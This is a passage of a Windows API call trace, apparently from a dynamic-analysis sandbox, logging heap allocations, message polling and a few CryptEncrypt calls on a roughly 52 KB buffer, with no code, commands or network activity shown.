hHeap=0x970000) returned 1 [0232.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0232.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0232.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0232.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0232.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0232.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0232.875] CryptEncrypt (in: hKey=0xa87490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xcb91, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xcb98) returned 1 [0232.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0232.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0232.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551d8 [0232.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0232.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0232.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0232.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0232.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0232.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0232.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0232.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0232.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0232.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0232.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0232.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0232.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0232.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0232.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0232.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0232.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0232.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0232.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0232.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0232.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0232.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0232.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0232.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0232.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0232.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0232.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0232.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0232.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0232.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0232.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0232.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0232.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0232.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0232.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0232.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0232.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0232.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0232.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0232.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0232.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0232.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0232.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0232.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0232.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0232.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0232.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0232.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0232.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0232.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0232.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0232.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0232.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0232.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0232.879] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0232.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0232.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0232.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0232.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0232.879] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.879] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0232.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0232.879] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0232.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0232.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0232.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0232.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0232.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0232.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0232.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0232.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0232.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0232.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0232.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0232.880] CharLowerBuffW (in: lpsz="byte[52120]", cchLength=0xb | out: lpsz="byte[52120]") returned 0xb [0232.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0232.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0232.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0232.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0232.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0232.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0232.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0232.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0232.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0232.880] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0232.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0232.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0232.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0232.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0232.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0232.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0232.884] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0232.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0232.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0232.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0232.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0232.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0232.884] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0232.884] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0232.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0232.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0232.886] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0232.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0232.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0232.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0232.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0232.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0232.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e513d0 [0232.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e513d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0232.887] CryptEncrypt (in: hKey=0xa87490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f3aaf8*, pdwDataLen=0x8cef60*=0xcb91, dwBufLen=0xcb98 | out: pbData=0x2f3aaf8*, pdwDataLen=0x8cef60*=0xcb98) returned 1 [0232.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0232.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0232.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0232.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0232.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0232.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0232.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0232.889] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552e8 [0232.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55158 [0232.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55198 [0232.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0232.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55148 [0232.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0232.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0232.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0232.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0232.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0232.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0232.890] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0232.890] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55268 [0232.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0232.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0232.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0232.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0232.890] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0232.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0232.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0232.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0232.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0232.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0232.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0232.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0232.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0232.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0232.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0232.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0232.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0232.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xcb98) returned 0x2e80330 [0232.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0232.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0232.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0232.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0232.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0232.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0232.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0232.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0232.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0232.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0232.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0232.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0232.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xcb98) returned 0x2e8ced0 [0232.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0232.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0232.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0232.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0232.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0232.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0232.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0232.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0232.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0232.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0232.892] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0232.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0232.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0232.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510e8 [0232.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0232.892] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0232.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040e0 [0232.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0232.893] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0232.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040e0 | out: hHeap=0x970000) returned 1 [0232.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51100 [0232.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0232.893] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0232.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 